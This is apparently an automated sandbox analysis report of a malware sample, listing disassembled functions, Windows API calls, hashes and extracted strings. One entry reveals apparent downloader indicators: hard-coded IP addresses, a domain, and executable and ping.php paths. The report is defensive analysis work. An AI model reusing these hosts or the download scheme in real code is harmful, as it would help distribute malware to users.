                                                                                                                                                        • API String ID: 3585332825-0
                                                                                                                                                        • Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
                                                                                                                                                        • Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
                                                                                                                                                        • Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
                                                                                                                                                        • Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                        • Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
                                                                                                                                                        • Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
                                                                                                                                                        • Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
                                                                                                                                                        • Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 7e3c3b2e03c3d6e18dbbb536e19013ee5f5a2c75f1da2fa632e63c4bac1336c5
                                                                                                                                                        • Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
                                                                                                                                                        • Opcode Fuzzy Hash: 7e3c3b2e03c3d6e18dbbb536e19013ee5f5a2c75f1da2fa632e63c4bac1336c5
                                                                                                                                                        • Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
                                                                                                                                                        • Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
                                                                                                                                                        • Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
                                                                                                                                                        • Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 042658E6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_4265000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                        • Instruction ID: 9e88890e2173048002f0e28c3b68b907d1edb57f534549ca23f4e6223087bf9c
                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                        • Instruction Fuzzy Hash: FF112B79A10208FFDB01DF98C985E98BBF5AF08351F058094F9489B362D371EA90DF80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D16823: __EH_prolog.LIBCMT ref: 05D16828
                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 05D14D3B
                                                                                                                                                          • Part of subcall function 05D162B1: __EH_prolog.LIBCMT ref: 05D162B6
                                                                                                                                                          • Part of subcall function 05D162B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05D16398
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                        • String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
                                                                                                                                                        • API String ID: 2531350358-3920416335
                                                                                                                                                        • Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
                                                                                                                                                        • Instruction ID: ae3b4d37f0f96f5f617f95a8db7cc588c1814f1f1e966f4a11574e8aca8402c5
                                                                                                                                                        • Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
                                                                                                                                                        • Instruction Fuzzy Hash: 24A2121061B2D0BEC791B77C5C5A7CE2BE0AB63640F547CAAC3A45B362DB54810CE7DA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                        • GetUserDefaultLCID.KERNEL32 ref: 00420977
                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 004209D2
                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                        • String ID: ,CUSA
                                                                                                                                                        • API String ID: 745075371-2978500865
                                                                                                                                                        • Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                        • Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
                                                                                                                                                        • Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                        • Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                        • Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
                                                                                                                                                        • Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
                                                                                                                                                        • Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
                                                                                                                                                        • Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00420015
                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004200A5
                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004200B3
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                        • String ID: ,CUSA
                                                                                                                                                        • API String ID: 4212172061-2978500865
                                                                                                                                                        • Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                        • Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
                                                                                                                                                        • Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                        • Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 05D10997
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 05D109C0
                                                                                                                                                        • GetACP.KERNEL32 ref: 05D109D5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                        • Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                        • Instruction ID: 62954352e05b96ba792e43f3c2d4da3bf39e522aff105338ffab6df346e6dfeb
                                                                                                                                                        • Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                        • Instruction Fuzzy Hash: 6F21B522B04104FBF730AF55E928BA772A7BB44A60B4A8467ED4BD7101E732D9C0C798
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
                                                                                                                                                        • GetACP.KERNEL32 ref: 0042076E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                        • Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                        • Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
                                                                                                                                                        • Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                        • Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FDF
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FEC
                                                                                                                                                        • GetUserDefaultLCID.KERNEL32 ref: 05D10BDE
                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 05D10C39
                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 05D10C48
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 05D10C90
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 05D10CAF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 745075371-0
                                                                                                                                                        • Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                        • Instruction ID: 3b700dc46681c4249bc3b0e42643c4a892c5f17427eb3f5940d7f06dba089182
                                                                                                                                                        • Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                        • Instruction Fuzzy Hash: 77519371A04219BBDB20FFA5EE48ABA73B9FF08705F044067ED05E7190DB709980CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: y%B$y%B
                                                                                                                                                        • API String ID: 0-2510245575
                                                                                                                                                        • Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
                                                                                                                                                        • Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
                                                                                                                                                        • Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
                                                                                                                                                        • Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
                                                                                                                                                          • Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
                                                                                                                                                          • Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
                                                                                                                                                          • Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE
                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 05D1027C
                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 05D1030C
                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 05D1031A
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 05D103BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4212172061-0
                                                                                                                                                        • Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                        • Instruction ID: 82e598c26729f893d9d95fcdad6112bb58216a4de1036c4813a9dffd72bd7d14
                                                                                                                                                        • Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                        • Instruction Fuzzy Hash: 2D61A572604206BBD724FB64EC49BB677A8FF08310F14446BED46DB190EA74E98487A8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2829624132-0
                                                                                                                                                        • Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
                                                                                                                                                        • Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
                                                                                                                                                        • Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
                                                                                                                                                        • Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 05D00A9A
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 05D00AA4
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 05D00AB1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                        • Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                        • Instruction ID: d041c25b3779c60b1b7b33e0a5b7c9248bad5066cc3856b02155e9d0ae500df1
                                                                                                                                                        • Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                        • Instruction Fuzzy Hash: 7A31B47490122CABCF61DF64D888B99B7B8BF08310F5055EAE50CA7290E7309F858F45
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                        • Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                        • Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
                                                                                                                                                        • Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                        • Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,05D03C24,00000003,00438DB0,0000000C,05D03D7B,00000003,00000002,00000000,?,05D02DD2,00000003), ref: 05D03C6F
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,05D03C24,00000003,00438DB0,0000000C,05D03D7B,00000003,00000002,00000000,?,05D02DD2,00000003), ref: 05D03C76
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 05D03C88
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                        • Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                        • Instruction ID: 3989f2a69d0d8c23c1cddba8b1566c69ca1086bab88f0e01792154a4b0e5cb39
                                                                                                                                                        • Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                        • Instruction Fuzzy Hash: B5E0B631200549ABCF216F65DE0CB993F6AFB44291F509425FD4ACA271CB35EE52CA98
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                        • Instruction ID: d10baf1ef282ae4f45510ec5c37512136d06f4407301195a7476a50476b52e3b
                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                        • Instruction Fuzzy Hash: 7B318CB6900609CFDB10CF99C884AAEBBF5FF08724F14444AD942B7311D771EA45CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
